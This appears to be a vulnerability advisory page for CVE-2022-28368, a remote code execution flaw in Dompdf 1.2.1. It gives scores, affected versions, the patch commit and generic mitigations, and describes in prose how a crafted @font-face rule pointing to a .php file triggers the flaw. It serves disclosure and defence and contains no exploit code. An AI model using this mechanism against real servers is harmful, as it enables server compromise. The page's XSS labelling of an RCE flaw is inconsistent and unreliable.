Cyber Resilience

CVE-2022-28368

CriticalPublic PoC

Published: 03 April 2022

Published
03 April 2022
Modified
21 November 2024
KEV Added
Patch
CVSS Score v3.1 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.8891 99.5th percentile
Risk Priority 73 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2022-28368 is a critical-severity Cross-site Scripting (CWE-79) vulnerability in Dompdf Project Dompdf. Its CVSS base score is 9.8 (Critical).

Operationally, ranked in the top 0.5% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

Deeper analysis

Dompdf version 1.2.1 is affected by a remote code execution vulnerability that occurs when an attacker supplies an HTML document containing a CSS @font-face rule whose src:url field references a .php file. The library processes the supplied stylesheet without sufficient validation of font sources, allowing the referenced PHP content to be executed in the context of the Dompdf process.

An unauthenticated remote attacker can exploit the flaw simply by submitting a crafted HTML file to any application that uses Dompdf to render user-controlled documents. Successful exploitation grants arbitrary code execution on the server, with impacts equivalent to full confidentiality, integrity, and availability compromise as reflected in the CVSS 9.8 rating.

The project addressed the issue in commit 4c70e1025bcd9b7694b95dd552499bd83cd6141d and pull request 2808; administrators should upgrade to a patched release. Public exploit code has been published, and the vulnerability maintains an EPSS score near 0.88, indicating sustained exploitation interest after disclosure.

EU & UK References

Vulnerability details

Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

dompdf project
dompdf
≤ 1.2.1

Mitigating Controls

Likely Mitigating Controls AI

Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.

addresses: CWE-79

Penetration testing submits XSS payloads to web applications, detecting cross-site scripting flaws for subsequent remediation.

addresses: CWE-79

Validates web inputs to reject script-related content that could produce XSS.

addresses: CWE-79

Output validation against expected content can reject or sanitize script content in generated web pages, reducing XSS exploitability.

References